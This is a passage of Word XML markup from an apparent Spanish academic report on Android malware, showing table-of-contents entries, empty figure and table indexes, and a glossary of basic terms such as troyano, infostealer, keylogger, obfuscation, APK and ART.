          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="es-ES" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>B.1   FORMA DE SEGUIMIENTO</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500184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1B7808" w14:textId="54EE935B" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500185" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="es-ES" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>B.2   PLANIFICACIÓN INICIAL</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500185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3ED89649" w14:textId="549968AF" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500186" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="NSimSun" w:hAnsi="Trebuchet MS" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="es-ES" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>B.3   PLANIFICACIÓN FINAL</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500186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160A3E05" w14:textId="56FFC725" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500187" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Anexo C: Apuntes adicionales</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500187 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>92</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44210A9E" w14:textId="21FA14F1" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Enlacedelndice"/>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A11B9A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39ACB25F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143AEAB" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C90ACE4" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="202020"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25456758" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc107862668"/>
      <w:bookmarkStart w:id="1" w:name="_Toc170500142"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Índice de figuras</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="729A5D81" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="27020318" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="133D727C" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="001463BF" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">1       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
      <w:hyperlink w:anchor="FiguraB_1"/>
    </w:p>
    <w:p w14:paraId="375DAC74" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADBAD4" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="202020"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E524F0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc107862669"/>
      <w:bookmarkStart w:id="3" w:name="_Toc170500143"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Índice de tablas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7FC707CA" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="1182D336" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92"/>
    <w:p w14:paraId="62ED77A3" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B138AD2" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00000000" w:rsidP="00E95A92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="TablaB_1"/>
    </w:p>
    <w:p w14:paraId="47C175A0" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="202020"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CA6512" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc107862670"/>
      <w:bookmarkStart w:id="5" w:name="_Toc170500144"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Glosario de términos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="66945D98" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4861E102" w14:textId="439B611A" w:rsidR="00382B7B" w:rsidRDefault="00382B7B" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware: </w:t>
      </w:r>
      <w:r w:rsidR="00A50D87">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">también conocido como código dañino, se trata de un programa informático que realiza acciones en un sistema sin el conocimiento ni autorización del usuario y con objetivos maliciosos como puede ser el robo de datos o </w:t>
      </w:r>
      <w:r w:rsidR="008208BF">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>la toma de control del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E3805" w14:textId="1B6A4430" w:rsidR="00E95A92" w:rsidRPr="00A9370F" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9370F">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Troyano</w:t>
      </w:r>
      <w:r w:rsidR="00913980">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00540C2D">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">tipo de malware que en la mayoría de </w:t>
      </w:r>
      <w:r w:rsidR="003D1DF0">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>los casos</w:t>
      </w:r>
      <w:r w:rsidR="00540C2D">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> se hace pasar por </w:t>
      </w:r>
      <w:r w:rsidR="003E2264">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>legítimo,</w:t>
      </w:r>
      <w:r w:rsidR="00540C2D">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero realmente permite a los atacantes tomar el control del dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427EDAF" w14:textId="3E9138A1" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A9370F">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Infostealer</w:t>
      </w:r>
      <w:r w:rsidR="00F75E54">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>: tipo de malware diseñado con el objetivo de realizar una exfiltración de datos del dispositivo infectado para obtener información que pueda resultar de interés a los atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD33EB3" w14:textId="1B181AF5" w:rsidR="006356F5" w:rsidRDefault="006356F5" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Keylogger: tipo de malware que destaca por su funcionalidad de registro de teclas</w:t>
      </w:r>
      <w:r w:rsidR="008C0138">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizadas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>, permitiendo la exfiltración de las cadenas de texto creadas por el usuario del dispositivo del usuario</w:t>
      </w:r>
      <w:r w:rsidR="008C0138">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> con fines maliciosos como puede ser el fraude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00826141">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>En algunos casos funciona como uno de los componentes de un malware infostealer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF04079" w14:textId="2A3AF517" w:rsidR="000C165B" w:rsidRDefault="000C165B" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Ofuscación</w:t>
      </w:r>
      <w:r w:rsidR="00746EB8">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">: técnica de modificación del código fuente de un sistema que busca aumentar la dificultad de su comprensión mediante el empleo de estrategias como la reordenación del código o el empleo de cifrado. Este sistema puede ser utilizado por atacantes para tratar de hacer más difícil la labor de análisis </w:t>
      </w:r>
      <w:r w:rsidR="00DF5C07">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">estático </w:t>
      </w:r>
      <w:r w:rsidR="00746EB8">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>del malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D210375" w14:textId="77F4B6EA" w:rsidR="008001DE" w:rsidRPr="00A9370F" w:rsidRDefault="008001DE" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">APK: </w:t>
      </w:r>
      <w:r w:rsidR="001C2875">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">tipo de archivo empaquetado utilizado </w:t>
      </w:r>
      <w:r w:rsidR="00675007">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="001C2875">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android</w:t>
      </w:r>
      <w:r w:rsidR="00A73E69">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00675007">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>para</w:t>
      </w:r>
      <w:r w:rsidR="00A73E69">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> las aplicaciones que se distribuyen en el ecosistema</w:t>
      </w:r>
      <w:r w:rsidR="001C2875">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A73E69">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> Contiene todos los materiales necesarios para la instalación de una aplicación, incluyendo su código, recursos y certificados. </w:t>
      </w:r>
      <w:r w:rsidR="001C2875">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se construye a partir de código fuente en Java o Kotlin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8EC7B" w14:textId="7D53AD4E" w:rsidR="00961F5F" w:rsidRDefault="00097B2E" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">ART:  </w:t>
      </w:r>
      <w:r w:rsidR="00346883">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">acrónimo de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>Android Runtime</w:t>
      </w:r>
      <w:r w:rsidR="00346883">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la máquina virtual que utilizan los dispositivos Android. Es el sistema sucesor de Dalvik y hace las veces de máquina virtual Java, pero cuenta con su propio sistema de bytecode.</w:t>
      </w:r>
      <w:r w:rsidR="00667C13">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> Realiza la traducción entre el bytecode generado y las instrucciones nativas del dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF9491" w14:textId="4B6036C6" w:rsidR="009A5BA7" w:rsidRDefault="009A5BA7" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel: núcleo del sistema operativo de un sistema, sirviendo de interfaz entre el hardware y los procesos que se ejecutan. Suele ser </w:t>
      </w:r>
      <w:r w:rsidR="00144C65">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t xml:space="preserve"> componente del sistema que tiene el máximo privilegio otorgado, y por lo tanto control total sobre las </w:t>
      </w:r>
      <w:r w:rsidR="00144C65">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
        <w:t>operaciones a realizar.</w:t>
      </w:r>
    </w:p>
